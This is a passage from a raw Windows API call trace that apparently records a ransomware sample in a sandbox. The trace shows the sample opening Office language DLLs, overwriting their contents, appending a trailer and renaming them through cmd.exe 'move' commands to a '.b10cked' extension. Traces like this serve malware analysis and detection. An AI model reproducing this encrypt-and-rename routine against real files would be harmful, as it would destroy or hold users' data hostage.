hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xd8c, dwThreadId=0x3dc)) returned 1 [0157.002] CloseHandle (hObject=0x1b4) returned 1 [0157.002] CloseHandle (hObject=0x114) returned 1 [0157.002] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.002] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.002] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.002] ReleaseMutex (hMutex=0xf8) returned 1 [0157.002] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21419819951) returned 1 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xcd60 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0157.409] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcd60 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xc878 [0157.410] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0157.438] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0157.438] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xcd60 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xcd60 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.439] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.439] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x66af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x66af, lpOverlapped=0x0) returned 1 [0157.465] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.465] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x66af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x66af, lpOverlapped=0x0) returned 1 [0157.466] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x66b1 [0157.466] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x66af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x66af, lpOverlapped=0x0) returned 1 [0157.482] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26287, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x66b1 [0157.482] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x66af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x66af, lpOverlapped=0x0) returned 1 [0157.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0157.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0157.486] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xcd60 [0157.486] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0157.486] CloseHandle (hObject=0x114) returned 1 [0157.487] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX") returned 0x3c [0157.488] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0157.489] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xe6c, dwThreadId=0x82c)) returned 1 [0157.490] CloseHandle (hObject=0x1b4) returned 1 [0157.490] CloseHandle (hObject=0x114) returned 1 [0157.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.490] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0157.490] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.490] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0157.490] ReleaseMutex (hMutex=0xf8) returned 1 [0157.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21428015148) returned 1 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.491] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x45f60 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0157.492] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x45a78 [0157.492] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x45f60 [0157.525] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x45f60 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0157.526] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.526] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.659] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0157.661] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0157.662] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0157.662] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.663] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0157.663] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0157.663] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, 